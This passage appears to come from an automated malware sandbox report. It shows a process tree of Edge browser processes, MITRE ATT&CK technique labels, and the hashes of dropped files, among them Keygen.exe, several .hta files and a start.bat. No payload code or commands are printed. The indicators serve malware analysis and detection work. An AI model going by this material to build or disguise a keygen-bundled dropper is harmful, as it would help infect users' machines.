  PID:3396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:2352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  2⤵
  PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
  2⤵
  PID:3032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
  2⤵
  PID:3184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5556 /prefetch:8
  2⤵
  PID:2776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
  2⤵
  PID:2968
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
  2⤵
  PID:116
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:1568
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff607c55460,0x7ff607c55470,0x7ff607c55480
    3⤵
    PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1
  2⤵
  PID:4164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
  2⤵
  PID:2944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
  2⤵
  PID:60
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1
  2⤵
  PID:3044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6224 /prefetch:8
  2⤵
  PID:2940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
  2⤵
  PID:3288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
  2⤵
  PID:2300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:2116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,13368219857637530866,7816133971521242710,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1912 /prefetch:1
  2⤵
  PID:5024

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:924

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
12bdf3bfbe10afc0b9b8a30fe850f3dc

SHA1
882017f1f6a343f271a6b2849b85b45ff1e70831

SHA256
757e90fd2cd589edaea349007bc83485bc9f8ce0099e3cf28ce12dd0d7aa558b

SHA512
2f0c33f86a95a7bd7410e149072c2ebb28850be6debbcde7b735f7c564abd9871cdd19fc549b6a0a1183c30b0e525bccae794aa91aef2e4aa270c41904fca14e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5e66a3d46ce02326d71914c69bb1ff5e

SHA1
91ccf10b11a8c2d127fe825840b0f5a3c5a51513

SHA256
8408d688778cfc5151fd454f1182175674719a8a5709dd36aaac95512c7b1054

SHA512
3fc4c3299a000fd48b25ec9fa88d87892fe60b3e82005195d0afc80e028ff270e1429bb2a4fc07cfcfd5d8c23a44283c92a11f9ff11d28ec951331e3df05326c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9d9e89a46ea1c979d600d8ecff95392f

SHA1
a03b20076c4a9bd34d03af90e43d5815943d187b

SHA256
7d5e0d521951eff280f780f5134b8f1b4c614bb4e96ce15577201272a1e4478c

SHA512
7bd673c3e908e62928b35bb2ca183a79e575775a1b76b1bd3e584c9da331d4a4c213b3de25fe209090504ce0af3f3823a27767196ed81cceb7f881106e068429

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
f562f998a5b32ed242026f17f8bdd292

SHA1
a1b0941ef864b9dbfa1fd223b60fa55de5e5edf3

SHA256
a63b6b2548cbd2ec918dcc333e9000accc87c9196a97126a9c6a33dc37fd56bf

SHA512
12b7b42c7a4ebdf9eafbbc2209c860b5935047b76036ad1e6cc359063f2538e79d69bfa70caa5e080caba91d9ea8a6f492dfbf5a27d957a80af61c214bda75f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
e22349489f845c98bcb126bbabeb601a

SHA1
e3f0c204a1d30a9a8b91cec6df3d30547b268ea3

SHA256
ca29a8003c0049fef18409ebda867e48cc53fcc4d8c731b7888a31eaa3ded5ea

SHA512
dc80884999d9d1ab4cf77a3a40df032950eda302238ba02914622e3781ebed590bbd4bf05d48e09c232106f10f1ab06df4a1b8c076db3405abebf4acdee2e053

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
42233ed28c62a49838acba2a8c36e14f

SHA1
e724778f85efcd7ecb177962874e9dd0c48cbd7d

SHA256
256545c8d725fb3d696d93924bc554646f456ba391157151f2d64a90f6510b71

SHA512
611fa5e2b8d849583a65ab50c8e4a69eecc55345863403a3e7bb15634a13cc6a917be93466f84f152c7a90c6e59125153e4ff94272e13516303e61d74b17103d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
11d3bbafe9738e38de477c4e6ba1312b

SHA1
26cf031886615fb614da379c60ff6accacf29c29

SHA256
b18628df998351af838b33c92aaad6fcae6e3f6220f1719b8e7af262a667d576

SHA512
a0f1fcf49fcb6d2cc7775acb22c825e25352790e605c9819b31c34da1370db92f2762b03bad0c79a417683296bf6ebe19987f839faac93027bc90298065d9673

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c5fe3490a055106e4fd4b294751faa48

SHA1
1303da7d61a5caf04b5774af64a62c48e948847d

SHA256
09c3f2f4603079efa6b5f528a786a7e16fa76cb395136a9ab275cd46dcf21f40

SHA512
ac066a3bd23454a00a16eedcae9ffc7197bc18da6edeff66bda5d59572c97ec368e8ecf76e8366715b45f82d197c82e4eaf9d0f11893a8bcc34fdbf79cbdd8bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
ff5dd20177add5f2fb07a017c096ccce

SHA1
7afe60457ca44419c3421847c4202a50fd4b80a8

SHA256
0e18c1f1f59aefdb789413aefaeaa005421e9369195f7c35929008ec30b50cb0

SHA512
3bbbb7e4af49e8a92b5dba457567a249db23b50a1b4a79c33bc38a14e5dc4ae9dbf480b6f42abfd3da28af57c06aeaf4b0b7f3da39b712ca49981c8c7973c77a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
8bbb70b63ea38955801783c83b928cf0

SHA1
91e76aa432aa9b323f7f8efb7dc94fe0b9587496

SHA256
e31be9b1110c9d3f71b40293c8f3d21fbdb1d53910d91dad2ed1f29c363102cb

SHA512
1172db8453c8902fe6ab8e417ae44da691b72e8e05a50c85d5bda1ae3cd6b54407b1393d9707cd152bc37ad56b1c380ef23dae445f8f27e35844f6233132804c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
216B

MD5
4e48b740082b857e62a7e0b65e58c009

SHA1
17e87747673f9b0b662e16efe53a42f6256cf323

SHA256
89bcd311454754acc4d459fe8a9bacb6f02b9c1ab9ce77445596a59d81eba781

SHA512
ce5879c7edbd45e1bf1bd792e186755e4ff966bdc58e22fb6960fd9ee3f7f2eec20ae3f5e7c61707461954b916a992adcf90f68d5169f2dfe306fff6c4cdb66d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5ba9ba.TMP

Filesize
48B

MD5
a45dd171a1ae74563db13bcf930eac59

SHA1
26d135f7a6168d8c2b537c83515ae0d1538d0727

SHA256
72bf0563d630857e6935d5382baf206591d3349bcdfcebd6ae592abe5660bc8a

SHA512
021d93bfebc7779b5d42c2383e9b3391c7d3b41ae9b537ca765f97fc48a81e1d894c7e649c8db29e3ce6ba4623bfa813adb3f55e10f217b41a8f04ae9d2bc758

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
873B

MD5
837b95bf5b9b09a03877afc395f62206

SHA1
bcb90824183404033cbafe98c492a2f27b49d55c

SHA256
b80060e7cc885b5b3256015ea2849b5b8c64623fc85614919cff6775040c43fe

SHA512
43229ddd852ef3306b5a13ca7e2868b87d30d9c555c99efe1b104ac2fa08dad5d2695bc3f958d5e7927ee50349f2723d549acddd94437232db74319c27cf6520

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5b7d5a.TMP

Filesize
706B

MD5
ca09b5196874470f694198e994629a16

SHA1
d5ccd2da8bce78ce9b2066e4984993c0f6d51ba2

SHA256
54c7e3378a7c60a6e9df25ca5af4311544e2596958348e40534e7c8d6f19b0ea

SHA512
8e04c98cc236b5769ac2c595a675d6517fdbd029f85749294b1b9a21738a30a1d968a838947952409045d1ea76c7164c1b08a2884b83b2f54ecfb2eb3a2f538c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d53869c2-f041-4f2b-aa69-b91f795ad869.tmp

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
14d6a6fa1474a200027036a00553cc8a

SHA1
40aadac494a4c06891bd1578bf8a91bdb2c65bfa

SHA256
4ac6f29ca1a488cae67191e7d25717ab01257e52e134a11fc81f00703b19ddfb

SHA512
07ec1a83f5d125b544eee796586e8d5cf4d295a13486f95f6b32448c8e3315eb3e651bc845f7f9249b898dd5c17b2d4559f9ff9de3f8e40796f06b37ccc81a05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
c1c5129f1958aac08a2735943a3c45a8

SHA1
2b0c1251cfb1ca0ee546b8a5f22c59545a630cd0

SHA256
82913b3cca0cbd252a9dfb0ae052b7be26e4d8d1e701c2c7e207ef4e34e5bd56

SHA512
740e927ac20c240efe93a6824f410aea932604e95216c1a1cba4f981c42f4e6db02e5b96538b8301269300e90b155bd443b885430bfbc7cc36d66deb5222e4bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
435aea548a90f546557e3abb1ec70fd1

SHA1
d859a632669677c1829ce8daba2ae2152bfd3da7

SHA256
fbff0c1e5bfd6fedf7b73c3c769450bb657dcc6aaf18d3e9d0c3154ae6dcda39

SHA512
e3102e800f43e50a159994e469a50ec09d2672c8740351edb7bc933cdb08a3c2d9d1f1773ff9fc8622fe2429844f483c3cf50f9df19e2e0a8ebb398bc9dd3695

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
8c1c390f6544339d82c07b86a3b0445a

SHA1
c5903e41d3a7d255830fa7b9dbaf3f4952223b7f

SHA256
a5d16d6449bf1a4b3112ea19e6d6a0d160b66c3744ad7992131c6e5fc9280038

SHA512
9f8beb9557d4b9f3fd8b0aded6166d08256c3fb133d3ce8cb0c302108a99a70837816aa2fab8d5459ae3637b6df7c5e35cf5ec2faed962f52d441d9ee5b74ab9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
63cd7fa21d27b0ccd54e049f4ad7bf5d

SHA1
fdfdd592b3730bbf8122ac144054e413f7f9089a

SHA256
7c0d195bcd6d1b077fc6f463eaaf6c21fc2ed035cfaa8a0d2246d53755aeaef7

SHA512
bbcdc7f81f46fef4f94263f73e1298c84cf00898b4cd7a1af64ae9bdad883e21f6bfaf36e249eeab75bbb9e8410bb6becc9f24d74826c6a94a65b4ba1285e5ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
af23dfd6f4a1397514974ea5a6e7aa6b

SHA1
c901b39cfd1ebfa149484f956984f1f33399b300

SHA256
08e1a57aae6829214b71b4d610d98afca069cc761c54c3faa4c2299ee9c76b43

SHA512
34d427ad84a33fa6bcc6d037e344e31806f51af6f80a12c71e321d0952253db9a802b3de75e10b648ff47be1710de32eba4fd92538c85f9e623c6b4592ef71af

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\Keygen.exe

Filesize
678KB

MD5
ea2c982c12fbec5f145948b658da1691

SHA1
d17baf0b8f782934da0c686f2e87f019643be458

SHA256
eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

SHA512
1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\b.hta

Filesize
17KB

MD5
5bbba448146acc4530b38017be801e2e

SHA1
8c553a7d3492800b630fc7d65a041ae2d466fb36

SHA256
96355db8fd29dcb1f30262c3eac056ff91fd8fa28aa331ed2bedd2bd5f0b3170

SHA512
48e3d605b7c5531cb6406c8ae9d3bd8fbb8f36d7dd7a4cbe0f23fc6ef2df08267ce50d29c7ec86bf861ebdcf9e48fb9c61c218f6584f1a9a0289a10a2fec730b

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\b1.hta

Filesize
17KB

MD5
c57770e25dd4e35b027ed001d9f804c2

SHA1
408b1b1e124e23c2cc0c78b58cb0e595e10c83c0

SHA256
bb0fd0011d5a0c1bbb69cb997700eb329eee7bed75fef677122fcfda78edc7f5

SHA512
ac6d957d2b6218d9c19dea60b263d6148f730a7a4599e03023afc0881b9f4051d20e5f1d94fc3e416c5e12bcc9846a43af90f55767271ef0cc4b84f31f432ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\ba.hta

Filesize
17KB

MD5
b762ca68ba25be53780beb13939870b2

SHA1
1780ee68efd4e26ce1639c6839c7d969f0137bfd

SHA256
c15f61a3c6397babdf83b99b45345fec9851c4d3669c95b717f756b7c48050d1

SHA512
f99570d2dae550cb1474e2d1cabf8296a685e0e7254d92eb21d856acb8dece635a0842a00d63da2a4faa18c52c57244c565d6a752c857d5c15e8c23b3d4a9e1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\ba1.hta

Filesize
17KB

MD5
a2ea849e5e5048a5eacd872a5d17aba5

SHA1
65acf25bb62840fd126bf8adca3bb8814226e30f

SHA256
0c4ffba2e00da7c021d0dcab292d53290a4dc4d067c029e5db30ba2ac094344c

SHA512
d4e53c150e88f31c9896decfaa9f0a8dfab5d6d9691af162a6c0577786620fb1f3617398fc257789a52e0988bf1bfc94255db6d003397863b0b9e82afabdb89f

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\m.hta

Filesize
17KB

MD5
9383fc3f57fa2cea100b103c7fd9ea7c

SHA1
84ea6c1913752cb744e061ff2a682d9fe4039a37

SHA256
831e8ee7bc3eeeaaa796a34cbb080658dec1be7eb26eb2671353f650041b220d

SHA512
16eda09f6948742933b6504bc96eb4110952e95c4be752e12732cb3b92db64daa7a7a0312ca78ff1ceb7cffd7bd8a7d46514226fc3cea375b4edb02a98422600

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\m1.hta

Filesize
17KB

MD5
5eb75e90380d454828522ed546ea3cb7

SHA1
45c89f292d035367aeb2ddeb3110387a772c8a49

SHA256
dd43305abbbe5b6cc4ab375b6b0c9f8667967c35bb1f6fefb0f1a59c7c73bd5e

SHA512
0670ef4f687c4814125826b996d10f6dd8a1dd328e04b9c436ee657486b27b1eefad5b82dcc25bd239d36b7ac488f98e5adcff56c5e82f7d0ed41f03301947c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\start.bat

Filesize
176B

MD5
68d86e419dd970356532f1fbcb15cb11

SHA1
e9ef9a9d047f1076ba2afbe4eabec2ea2338fb0a

SHA256
d150a28b978b2d92caac25ee0a805dec96381471702a97f1099707b8538c6cbe

SHA512
3078c8c33b18ca1aa3bb2f812e5f587f5b081a4bd857f942ab382383faf09dbe8af38054546bf49037b79081c9406dc25647ae5bd843abc8fcca25c7b3afae14

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nbh5051o.ium.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
07acbb10f576387637a386f140ed7e6f

SHA1
8362200dc377c830c50630748f8db4204ed7e837

SHA256
6cbc59770ab66d20613456c46de8995010650666582c4f6cade81845f3e9faef

SHA512
4bade2b528aa13c6c7a1bcdd0521a286805afd55095a730eb7d4cf0f3ce5751ac87871fbc82a55d4e7a817f31c1c3407893d33552f88b464a468f6eebe9b45b7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
23f6dd7f22f74e0cb22d6a2b5b644441

SHA1
e4e22e899bed79c4957d9a0ad84409f6698bc224

SHA256
46b5dfe5d1abf5fc8e5879870a61bb9b7763bcdce4907ded56e7ad7dc0cf97c2

SHA512
d26241f241e62482406312f74095112c6f949b9056204a83a3795557cd1c0343405865361434dea37732d5fcfd73be91134ceebec0ba3d3ea986e2d0c441312c

Download Submit
memory/216-78-0x0000000006790000-0x00000000067DC000-memory.dmp

Filesize
304KB

Download
memory/216-37-0x00000000051B0000-0x00000000051D2000-memory.dmp

Filesize
136KB

Download
memory/216-36-0x00000000052E0000-0x00000000059AA000-memory.dmp

Filesize
6.8MB

Download
memory/216-49-0x0000000005D00000-0x0000000006057000-memory.dmp

Filesize
3.3MB

Download
memory/216-85-0x0000000007720000-0x00000000077B6000-memory.dmp

Filesize
600KB

Download
memory/216-77-0x00000000061F0000-0x000000000620E000-memory.dmp

Filesize
120KB

Download
memory/216-86-0x00000000076B0000-0x00000000076D2000-memory.dmp

Filesize
136KB

Download
memory/216-92-0x0000000008790000-0x0000000008D36000-memory.dmp

Filesize
5.6MB

Download
memory/984-119-0x0000000000400000-0x00000000005BC000-memory.dmp

Filesize
1.7MB

Download
memory/984-130-0x0000000000400000-0x00000000005BC000-memory.dmp

Filesize
1.7MB

Download
memory/984-129-0x0000000000400000-0x00000000005BC000-memory.dmp

Filesize
1.7MB

Download
